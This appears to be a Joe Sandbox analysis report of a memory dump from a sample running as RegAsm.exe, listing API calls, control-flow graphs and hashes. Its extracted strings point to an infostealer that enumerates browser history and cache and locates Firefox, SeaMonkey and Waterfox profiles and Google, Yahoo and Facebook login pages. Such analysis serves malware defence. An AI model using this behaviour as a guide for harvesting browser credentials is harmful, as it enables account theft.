                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                          • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                            • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                          • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                          • CloseHandle.KERNEL32(?), ref: 0040E13E
                                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                          • CloseHandle.KERNEL32(?), ref: 0040E148
                                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                          • String ID: bhv
                                          • API String ID: 4234240956-2689659898
                                          • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                          • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                          Control-flow Graph

                                          control_flow_graph 562 4466f4-44670e call 446904 GetModuleHandleA 565 446710-44671b 562->565 566 44672f-446732 562->566 565->566 567 44671d-446726 565->567 568 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 566->568 570 446747-44674b 567->570 571 446728-44672d 567->571 575 4467ac-4467b7 __setusermatherr 568->575 576 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 568->576 570->566 574 44674d-44674f 570->574 571->566 573 446734-44673b 571->573 573->566 577 44673d-446745 573->577 578 446755-446758 574->578 575->576 581 446810-446819 576->581 582 44681e-446825 576->582 577->578 578->568 583 4468d8-4468dd call 44693d 581->583 584 446827-446832 582->584 585 44686c-446870 582->585 588 446834-446838 584->588 589 44683a-44683e 584->589 586 446845-44684b 585->586 587 446872-446877 585->587 593 446853-446864 GetStartupInfoW 586->593 594 44684d-446851 586->594 587->585 588->584 588->589 589->586 591 446840-446842 589->591 591->586 595 446866-44686a 593->595 596 446879-44687b 593->596 594->591 594->593 597 44687c-446894 GetModuleHandleA call 41276d 595->597 596->597 600 446896-446897 exit 597->600 601 44689d-4468d6 _cexit 597->601 600->601 601->583
                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                          • __set_app_type.MSVCRT ref: 00446762
                                          • __p__fmode.MSVCRT ref: 00446777
                                          • __p__commode.MSVCRT ref: 00446785
                                          • __setusermatherr.MSVCRT ref: 004467B1
                                          • _initterm.MSVCRT ref: 004467C7
                                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                          • _initterm.MSVCRT ref: 004467FD
                                          • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                          • exit.MSVCRT ref: 00446897
                                          • _cexit.MSVCRT ref: 0044689D
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                          • String ID:
                                          • API String ID: 2791496988-0
                                          • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                          • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                          • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                          • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                          Control-flow Graph

                                          APIs
                                          • memset.MSVCRT ref: 0040C298
                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                          • wcschr.MSVCRT ref: 0040C324
                                          • wcschr.MSVCRT ref: 0040C344
                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                          • GetLastError.KERNEL32 ref: 0040C373
                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                          • String ID: visited:
                                          • API String ID: 2470578098-1702587658
                                          • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                          • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                          Control-flow Graph

                                          control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 647 40e283-40e286 640->647 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 647->648 649 40e288-40e290 free 647->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                                          APIs
                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                          • memset.MSVCRT ref: 0040E1BD
                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                          • free.MSVCRT ref: 0040E28B
                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                          • _snwprintf.MSVCRT ref: 0040E257
                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                                          • API String ID: 2804212203-2982631422
                                          • Opcode ID: b421f0fbbd6ad79df9d48377ab98bfefffe95da864e54072a2f7617dfae47395
                                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                          • Opcode Fuzzy Hash: b421f0fbbd6ad79df9d48377ab98bfefffe95da864e54072a2f7617dfae47395
                                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                            • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                          • memset.MSVCRT ref: 0040BC75
                                          • memset.MSVCRT ref: 0040BC8C
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                          • memcmp.MSVCRT ref: 0040BCD6
                                          • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                          • String ID:
                                          • API String ID: 115830560-3916222277
                                          • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                          • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                          • String ID: r!A
                                          • API String ID: 2791114272-628097481
                                          • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                          • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                          • _wcslwr.MSVCRT ref: 0040C817
                                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                          • wcslen.MSVCRT ref: 0040C82C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                          • API String ID: 2936932814-4196376884
                                          • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                          • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                          Control-flow Graph

                                          control_flow_graph 770 40b58d-40b59e 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW 770->771 772 40b62e-40b632 770->772 773 40b5c2-40b5ce LoadResource 771->773 774 40b5e7 771->774 773->774 775 40b5d0-40b5e5 SizeofResource LockResource 773->775 776 40b5e9-40b5eb 774->776 775->776 776->772 777 40b5ed-40b5ef 776->777 777->772 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 777->778 778->772
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                          • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                          • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                          • String ID: BIN
                                          • API String ID: 1668488027-1015027815
                                          • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                          • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED

                                          Control-flow Graph

                                          APIs
                                          • memset.MSVCRT ref: 00403CBF
                                          • memset.MSVCRT ref: 00403CD4
                                          • memset.MSVCRT ref: 00403CE9
                                          • memset.MSVCRT ref: 00403CFE
                                          • memset.MSVCRT ref: 00403D13
                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                          • memset.MSVCRT ref: 00403DDA
                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                          • String ID: Waterfox$Waterfox\Profiles
                                          • API String ID: 4039892925-11920434
                                          • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                          • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                          APIs
                                          • memset.MSVCRT ref: 00403E50
                                          • memset.MSVCRT ref: 00403E65
                                          • memset.MSVCRT ref: 00403E7A
                                          • memset.MSVCRT ref: 00403E8F
                                          • memset.MSVCRT ref: 00403EA4
                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                          • memset.MSVCRT ref: 00403F6B
                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                          • API String ID: 4039892925-2068335096
                                          • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                          • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                          APIs
                                          • memset.MSVCRT ref: 00403FE1
                                          • memset.MSVCRT ref: 00403FF6
                                          • memset.MSVCRT ref: 0040400B
                                          • memset.MSVCRT ref: 00404020
                                          • memset.MSVCRT ref: 00404035
                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                          • memset.MSVCRT ref: 004040FC
                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                          • API String ID: 4039892925-3369679110
                                          • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                          • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                          • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                          • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                          APIs
                                          • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                          • API String ID: 3510742995-2641926074
                                          • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                          • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                          • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                          • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                          APIs
                                          • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                          • GetLastError.KERNEL32 ref: 0041847E
                                          • free.MSVCRT ref: 0041848B
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CreateErrorFileLastfree
                                          • String ID: |A
                                          • API String ID: 981974120-1717621600
                                          • Opcode ID: a88df5da1066620bdf33ca4472b3118252cb96d9155fbf9def9e1204f2136f90
                                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                          • Opcode Fuzzy Hash: a88df5da1066620bdf33ca4472b3118252cb96d9155fbf9def9e1204f2136f90
                                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                          APIs
                                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                          • memset.MSVCRT ref: 004033B7
                                          • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                          • wcscmp.MSVCRT ref: 004033FC
                                          • _wcsicmp.MSVCRT ref: 00403439
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                          • String ID: $0.@
                                          • API String ID: 2758756878-1896041820
                                          • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                          • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                          • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                          • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                          APIs
                                          • memset.MSVCRT ref: 00403C09
                                          • memset.MSVCRT ref: 00403C1E
                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                          • wcscat.MSVCRT ref: 00403C47
                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                          • wcscat.MSVCRT ref: 00403C70
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                          • API String ID: 1534475566-1174173950
                                          • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
